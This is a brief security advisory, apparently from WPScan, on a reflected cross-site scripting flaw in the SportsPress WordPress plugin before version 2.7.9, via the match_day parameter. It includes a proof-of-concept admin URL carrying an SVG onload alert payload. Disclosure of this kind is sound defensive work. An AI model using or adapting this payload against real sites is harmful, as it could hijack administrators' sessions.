SportsPress < 2.7.9 - Reflected Cross-Site Scripting

2021-11-1600:00:00

iohex

wpscan.com

sportspress

cross-site scripting

xss

reflected

security issue

EPSS

0.001

Percentile

43.7%

JSON

The plugin does not sanitise and escape its match_day parameter before outputting back in the Events backend page, leading to a Reflected Cross-Site Scripting issue

PoC

https://example.com/wp-admin/edit.php?post_type=sp_event&match;_day="><svg%2Fonload%3Dalert(%2FXSS%2F)%3B><"

EPSS

0.001

Percentile

43.7%

JSON

Related for WPVDB-ID:69351798-C790-42D4-9485-1813CD325769